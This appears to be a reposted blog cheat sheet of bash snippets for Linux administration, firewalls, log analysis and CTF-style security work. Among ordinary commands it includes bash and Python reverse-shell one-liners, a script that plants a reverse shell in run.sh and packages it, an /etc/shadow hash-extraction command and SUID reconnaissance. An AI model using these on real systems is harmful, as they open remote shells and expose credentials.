Bash snippets
Source: Internet    Editor: 程序博客网    Time: 2024/06/18 18:19
References:
searchsploit
openkeerp-cli
youtube
Enable the Intel disassembly flavor in gdb
$ echo "set disassembly-flavor intel" > ~/.gdbinit
$ gdb ./x
...
(gdb) disas main
Dump of assembler code for function main:
   0x0000000000400637 <+0>:     push   rbp
   0x0000000000400638 <+1>:     mov    rbp,rsp
   0x000000000040063b <+4>:     sub    rsp,0x30
   0x000000000040063f <+8>:     mov    DWORD PTR [rbp-0x24],edi
   0x0000000000400642 <+11>:    mov    QWORD PTR [rbp-0x30],rsi
   0x0000000000400646 <+15>:    mov    rax,QWORD PTR fs:0x28
   0x000000000040064f <+24>:    mov    QWORD PTR [rbp-0x8],rax
   0x0000000000400653 <+28>:    xor    eax,eax
   0x0000000000400655 <+30>:    mov    rax,QWORD PTR [rbp-0x30]
   0x0000000000400659 <+34>:    add    rax,0x8
   0x000000000040065d <+38>:    mov    rdx,QWORD PTR [rax]
   0x0000000000400660 <+41>:    lea    rax,[rbp-0x20]
   0x0000000000400664 <+45>:    mov    rsi,rdx
   0x0000000000400667 <+48>:    mov    rdi,rax
   0x000000000040066a <+51>:    call   0x4004d0 <strcpy@plt>
   0x000000000040066f <+56>:    lea    rax,[rbp-0x20]
   0x0000000000400673 <+60>:    mov    rsi,rax
   0x0000000000400676 <+63>:    mov    edi,0x40072c
   0x000000000040067b <+68>:    mov    eax,0x0
   0x0000000000400680 <+73>:    call   0x400500 <printf@plt>
   0x0000000000400685 <+78>:    mov    eax,0x0
   0x000000000040068a <+83>:    mov    rcx,QWORD PTR [rbp-0x8]
   0x000000000040068e <+87>:    xor    rcx,QWORD PTR fs:0x28
   0x0000000000400697 <+96>:    je     0x40069e <main+103>
   0x0000000000400699 <+98>:    call   0x4004f0 <__stack_chk_fail@plt>
   0x000000000040069e <+103>:   leave
   0x000000000040069f <+104>:   ret
End of assembler dump.
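Linux files: protecting files against modification, deletion, moving, etc.
Automatically restore a monitored directory when new files or directories are created in it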
https://github.com/ssooking/CTFDefense/blob/02290457382a43d6d4daadd8e4e7e023d1d5d572/Monitor/SimpleMonitor.py
Usage
pip install pyinotify
python -m pyinotify /tmp
Count the socket connections of a given process on Linux
ls /proc/<pid>/fd -l | grep socket: | wc -l
demo
cqq@kali:/tmp$ pidof sshd
51070 51068 21038
cqq@kali:/tmp$ sudo ls /proc/51068/fd -l | grep socket: | wc -l
[sudo] password for cqq:
3
cqq@kali:/tmp$ sudo ls /proc/51068/fd -l | grep socket:
lrwx------ 1 root root 64 Oct 10 17:45 3 -> socket:[109283]
lrwx------ 1 root root 64 Oct 10 17:45 4 -> socket:[109319]
lrwx------ 1 root root 64 Oct 10 17:45 6 -> socket:[109349]
Block client 202.202.43.125 from accessing any service on 202.202.43.55
iptables -t filter -A FORWARD -s 202.202.43.125 -d 202.202.43.55 -j DROP
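Drop unsolicited TCP response packets to prevent reflection-style attacks
# A NEW-state TCP packet without the SYN flag is not a legitimate connection opener
iptables -A INPUT -m state --state NEW -p tcp ! --syn -j DROP
iptables -A FORWARD -m state --state NEW -p tcp ! --syn -j DROP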
Deny/allow SSH login to this host from an IP or subnet
iptables -t filter -A INPUT -s 202.202.43.125 -p tcp --dport 22 -j DROP   # deny remote login to this host from 202.202.43.125
iptables -A INPUT -s 202.202.43.125/24 -p tcp --dport 22 -j ACCEPT   # allow the 202.202.43.125 subnet to log in remotely over ssh
Limit the maximum number of connections per IP
# Limit the maximum number of connections from a single IP to 30
iptables -I INPUT -p tcp --dport 80 -m connlimit --connlimit-above 30 -j REJECT
Block an IP or an IP range
iptables -I INPUT -s . -j DROP
iptables -I INPUT -s ./ -j DROP
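Back up / restore a MySQL database
## Back up a MySQL database
# -p without a value prompts for the password; in "-p password" the word after -p is read as the database name
mysqldump -u USERNAME -p DBNAME > back.sql
mysqldump --all-databases > bak.sql
## Restore a MySQL database
mysql -u USERNAME -p DBNAME < bak.sql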
Find all SUID executables on the system
# Search from / for files that have the SUID bit set and are owned by root, print them, and redirect all errors to /dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
demo
cqq@ubuntu:~$ find / -user root -perm -4000 -print 2>/dev/null
/bin/umount
/bin/ping
/bin/su
/bin/fusermount
/bin/ntfs-3g
/bin/ping6
/bin/mount
/usr/bin/vmware-user-suid-wrapper
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/chsh
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
cqq@ubuntu:~$ find / -perm -u=s -type f 2>/dev/null
/bin/umount
/bin/ping
/bin/su
/bin/fusermount
/bin/ntfs-3g
/bin/ping6
/bin/mount
/usr/bin/vmware-user-suid-wrapper
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/chsh
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
cqq@ubuntu:~$ find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
-rwsr-xr-x 1 root root 27608 Jun 14 14:51 /bin/umount
-rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping
-rwsr-xr-x 1 root root 40128 May 16 16:37 /bin/su
-rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount
-rwsr-xr-x 1 root root 142032 Jan 28 2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6
-rwsr-xr-x 1 root root 40152 Jun 14 14:51 /bin/mount
-rwsr-xr-x 1 root root 10624 Feb 9 2017 /usr/bin/vmware-user-suid-wrapper
-rwsr-xr-x 1 root root 54256 May 16 16:37 /usr/bin/passwd
-rwsr-xr-x 1 root root 75304 May 16 16:37 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 49584 May 16 16:37 /usr/bin/chfn
-rwsr-xr-x 1 root root 136808 Jul 4 00:37 /usr/bin/sudo
-rwsr-xr-x 1 root root 39904 May 16 16:37 /usr/bin/newgrp
-rwsr-xr-x 1 root root 40432 May 16 16:37 /usr/bin/chsh
-rwsr-xr-- 1 root messagebus 42992 Jan 12 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 Mar 16 2017 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
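The find commands above give a point-in-time list; for monitoring, the useful signal is an SUID file that was not present at the last review. The following is an added example, not from the original page: it runs the same `-perm -4000` scan and reports only paths missing from a baseline file. The names `suid_not_in_baseline` and `demo_suid_scan` and the scratch directory are assumptions made for the illustration.

```shell
#!/bin/sh
# Added example: list SUID files that are not in a reviewed baseline.
# suid_not_in_baseline and demo_suid_scan are hypothetical helper names.

# usage: suid_not_in_baseline BASELINE_FILE [ROOT_DIR]
# BASELINE_FILE holds one approved absolute path per line.
suid_not_in_baseline() {
    baseline=$1
    root=${2:-/}
    current=$(mktemp) || return 1
    # Same permission test as the find commands above; -xdev stays on one filesystem.
    find "$root" -xdev -type f -perm -4000 -print 2>/dev/null | sort > "$current"
    # comm -13 prints lines that appear only in the second (current) list.
    sort "$baseline" | comm -13 - "$current"
    rm -f "$current"
}

# Constructed demo: a scratch directory with two SUID files, one of them approved.
demo_suid_scan() {
    d=$(mktemp -d) || return 1
    : > "$d/approved"; : > "$d/unexpected"; : > "$d/plain"
    chmod 4755 "$d/approved" "$d/unexpected"
    chmod 0755 "$d/plain"
    printf '%s\n' "$d/approved" > "$d/baseline.txt"
    # Strip the scratch prefix so the result is stable between runs.
    suid_not_in_baseline "$d/baseline.txt" "$d" | sed "s|^$d/||"
    rm -rf "$d"
}

demo_suid_scan
```

On a real host the baseline would be the reviewed output of an earlier scan, and any line printed is a file to investigate.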
Vim global replace command
:%s/xxxx/yyyyy/g
Reverse shell variants
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
######################################
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
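Using SSH tunnels
ssh -qTfnN -L port:host:hostport -l user remote_ip   # forward tunnel, listens on the local port
ssh -qTfnN -R port:host:hostport -l user remote_ip   # reverse tunnel, used for reaching an internal network past firewall restrictions and the like
ssh -qTfnN -D port remotehost   # act directly as a SOCKS proxy
#
# -q quiet mode
# -T do not occupy a shell (no pseudo-terminal is allocated)
# -f run in the background (adding -n is recommended)
# -N do not execute a remote command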
Recursively change the owner and group of a directory and all files under it
# sudo chown -R cqq:cqq html
Recursively change the owner of a directory to the current user
# sudo chown -R $(whoami) /usr/local/share
SSH port forwarding
ssh -CfNg -L port1:127.0.0.1:port2 user@host   # local forwarding
ssh -CfNg -R port2:127.0.0.1:port1 user@host   # remote forwarding
Run a command as another user on Linux
# Run a command as another user on Linux
$ sudo -u www-data touch /var/www/html/test_www-data
# -u selects the user to run as; here the file /var/www/html/test_www-data is created as www-data
List all users from /etc/passwd
$ cat /etc/passwd |cut -d ':' -f 1
Extract users' password hashes from /etc/shadow
$ cat /etc/shadow |cut -d ':' -f 2 |egrep '^\$.\$'
Wireshark filter to hide packets of protocols you do not need
not arp and not ssdp and not icmp and not nbns and not dhcpfo and not llmnr and not mdns and not icmpv6 and not igmp and not dhcpv6
Add a user and add it to the sudo group
# Add a user and add it to the sudo group
$ useradd -m cqq -G sudo -s /bin/bash
# For an existing user, add it to the sudo group
$ usermod -a -G sudo cqq
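Script that adds a reverse shell to a bash script
import base64
import os
import tarfile

# args.lhost and args.lport come from the script's argument parser, which is not shown on the page
f = open('run.sh', 'w')
f.write('#!/bin/bash\n')
f.write('/bin/bash -i >& /dev/tcp/' + args.lhost + '/' + args.lport + ' 0>&1\n')
f.close()
# Finally, add execute permission
os.chmod('run.sh', 0o777)
# Add the file-packaging step
# Open a gz archive, add run.sh, then close it
tar = tarfile.open("root.tar.gz", "w:gz")
tar.add("run.sh")
tar.close()
# Read the tar file and base64-encode what was read
with open("root.tar.gz", "rb") as tar_fh:
    tar64 = base64.b64encode(tar_fh.read())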
Scripts for operations work
From: https://xianzhi.aliyun.com/forum/read/2150.html
Filter log entries whose Content-Length is greater than 5M
awk '{if($10>5000000){print $0}}' /var/log/httpd/access_log
Focus on POST requests
grep 'POST' /var/log/httpd/access_log | awk '{print $1}' | sort | uniq -c | sort -nr
View successful/failed SSH login information
grep 'Accepted' /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr
Or use the last command, which reads the file at /var/log/wtmp and displays the complete list of users recorded in it as having logged in to the system.
grep 'Failed' /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr
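Or use the lastb command, which reads the file at /var/log/btmp and displays the complete list of users recorded in it as having failed to log in to the system.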
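With the usual syslog prefix (`Mon DD HH:MM:SS host sshd[pid]:`), field 11 is the source address only in lines such as `Failed password for root from ...`; in `Failed password for invalid user NAME from ...` lines, field 11 is the user name. The following added example, not from the original page, keys on the `from <addr> port` triple instead and runs the page's pipeline on the same input for comparison. The log lines are constructed, and `ssh_login_sources`, `fixed_field_sources` and `sample_secure_log` are hypothetical names.

```shell
#!/bin/sh
# Added example: count sshd login results per source address by finding
# the "from <addr> port" triple instead of a fixed field number.
# ssh_login_sources and fixed_field_sources are hypothetical helper names.

# usage: ssh_login_sources Accepted|Failed < logfile
# output: "<count> <addr>" lines, highest count first
ssh_login_sources() {
    awk -v kind="$1" '
        $5 ~ /^sshd\[/ && $6 == kind {
            # Scan from the right: the user name is client-supplied and
            # may itself be "from"; the address is followed by "port".
            for (i = NF - 2; i >= 7; i--)
                if ($i == "from" && $(i + 2) == "port") { hits[$(i + 1)]++; break }
        }
        END { for (a in hits) print hits[a], a }
    ' | sort -k1,1nr -k2,2
}

# The pipeline from the page, kept for comparison on the same input.
fixed_field_sources() {
    grep "$1" | awk '{print $11}' | sort | uniq -c | sort -nr
}

# Constructed /var/log/secure lines (documentation address ranges).
sample_secure_log() {
    cat <<'EOF'
Oct 10 17:40:01 host sshd[2001]: Failed password for root from 203.0.113.7 port 40022 ssh2
Oct 10 17:40:03 host sshd[2001]: Failed password for invalid user admin from 203.0.113.7 port 40024 ssh2
Oct 10 17:40:05 host sshd[2003]: Failed password for invalid user test from 198.51.100.9 port 51000 ssh2
Oct 10 17:40:07 host sshd[2004]: Failed password for invalid user from from 198.51.100.9 port 51002 ssh2
Oct 10 17:41:10 host sshd[2010]: Accepted password for cqq from 192.0.2.15 port 50211 ssh2
Oct 10 17:41:30 host sshd[2012]: Accepted publickey for cqq from 192.0.2.15 port 50212 ssh2: RSA SHA256:constructed
Oct 10 17:42:00 host sshd[2013]: Failed password for invalid user admin from 203.0.113.7 port 40030 ssh2
EOF
}

sample_secure_log | ssh_login_sources Failed
```

On this sample the fixed-field pipeline credits 203.0.113.7 with one failure and lists `admin`, `test` and `from` as if they were sources, while the triple-based version attributes all five failures to the two addresses.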
Trapping terminal signals
function control_c(){
    service xxx stop
    echo -en "xxx has been stopped!"
    exit $?
}
# capture SIGINT(Ctrl + C) and exit the script clean
trap control_c SIGINT
Check whether the current user is root
if [ "0" != "$UID" ] ; then
    # message: "root privileges required"
    echo "需要 root 权限"
    exit 1
fi
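Check whether a directory exists
if [ ! -d "$CONFIG_PATH" ] ; then
    # message: "First use: run the ok-config command to configure; a wrong configuration prevents login"
    echo "首次使用,调用ok-config命令进行配置,若配置错误将无法登录"
    ok-config
fi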
Check whether a string's length is zero
True when the length is 0
if [ -z "$config_file" ]; then
    config_file="default"
fi
True when the length is not 0
if [ -n "$ppp_ip" ] ; then
    # message: "Login succeeded!"
    echo "登录成功!"
fi
Check a string's suffix
if [ "cqupt" == "$(echo $OK_USER | awk -F '@' '{print $2}')" ] ; then
Get the default gateway of the eth0 interface
gateway_ip=`ip r | awk '/default via/&&/dev 'eth0'/{print $3}'`
Print the IP information from the ifconfig-style output
root@snort-ids:/home/cqq/repos# ip a show dev eth0 | awk '/inet [12]/'
    inet 172.18.124.136/22 brd 172.18.127.255 scope global eth0
# Print the second column of the matching line
root@snort-ids:/home/cqq/repos# ip a show dev eth0 | awk '/inet [12]/{print $2}'
172.18.124.136/22
Delete default routes
ip route del 172.0.0.0/8 > /dev/null 2>&1
ip route del 202.202.0.0/16 > /dev/null 2>&1
Add intranet routes
OK_ETH='eth0'
ip route add 172.16.0.0/12 dev $OK_ETH via $gateway_ip metric $OK_METRIC table $OK_RTTABLE > /dev/null 2>&1
ip route add 172.32.0.0/16 dev $OK_ETH via $gateway_ip metric $OK_METRIC table $OK_RTTABLE > /dev/null 2>&1
ip route add 172.33.0.0/16 dev $OK_ETH via $gateway_ip metric $OK_METRIC table $OK_RTTABLE > /dev/null 2>&1
ip route add 172.34.0.0/16 dev $OK_ETH via $gateway_ip metric $OK_METRIC table $OK_RTTABLE > /dev/null 2>&1
ip route add 202.202.32.0/20 dev $OK_ETH via $gateway_ip metric $OK_METRIC table $OK_RTTABLE > /dev/null 2>&1
ip route add 202.202.43.0/24 dev $OK_ETH via $gateway_ip metric $OK_METRIC table $OK_RTTABLE > /dev/null 2>&1
ip route add 202.202.45.0/24 dev $OK_ETH via $gateway_ip metric $OK_METRIC table $OK_RTTABLE > /dev/null 2>&1
ip route add 222.177.140.0/24 dev $OK_ETH via $gateway_ip metric $OK_METRIC table $OK_RTTABLE > /dev/null 2>&1
progname="$( basename "$0" )"
...
## Usage info
function usage(){
  echo "  Usage: ${progname} [options] term1 [term2] ... [termN]"
  echo
  echo "=========="
  echo " Examples "
  echo "=========="
  echo "  ${progname} afd windows local"
  echo "  ${progname} -t oracle windows"
  echo "  ${progname} -p 39446"
  echo
  echo "  For more examples, see the manual: https://www.exploit-db.com/searchsploit/"
  echo
  echo "========="
  echo " Options "
  echo "========="
  echo "   -c, --case     [Term]      Perform a case-sensitive search (Default is inSEnsITiVe)."
  echo "   -e, --exact    [Term]      Perform an EXACT match on exploit title (Default is AND) [Implies \"-t\"]."
  echo "   -h, --help                 Show this help screen."
  echo "   -j, --json     [Term]      Show result in JSON format."
  echo "   -m, --mirror   [EDB-ID]    Mirror (aka copies) an exploit to the current working directory."
  echo "   -o, --overflow [Term]      Exploit titles are allowed to overflow their columns."
  echo "   -p, --path     [EDB-ID]    Show the full path to an exploit (and also copies the path to the clipboard if possible)."
  echo "   -t, --title    [Term]      Search JUST the exploit title (Default is title AND the file's path)."
  echo "   -u, --update               Check for and install any exploitdb package updates (deb or git)."
  echo "   -w, --www      [Term]      Show URLs to Exploit-DB.com rather than the local path."
  echo "   -x, --examine  [EDB-ID]    Examine (aka opens) the exploit using \$PAGER."
  echo "       --colour               Disable colour highlighting in search results."
  echo "       --id                   Display the EDB-ID value rather than local path."
  echo "       --nmap     [file.xml]  Checks all results in Nmap's XML output with service version (e.g.: nmap -sV -oX file.xml)."
  echo "                                Use \"-v\" (verbose) to try even more combinations"
  echo "======="
  echo " Notes "
  echo "======="
  echo " * You can use any number of search terms."
  echo " * Search terms are not case-sensitive (by default), and ordering is irrelevant."
  echo "   * Use '-c' if you wish to reduce results by case-sensitive searching."
  echo "   * And/Or '-e' if you wish to filter results by using an exact match."
  echo " * Use '-t' to exclude the file's path to filter the search results."
  echo "   * Remove false positives (especially when searching using numbers - i.e. versions)."
  echo " * When updating from git or displaying help, search terms will be ignored."
  echo ""
  exit 2
}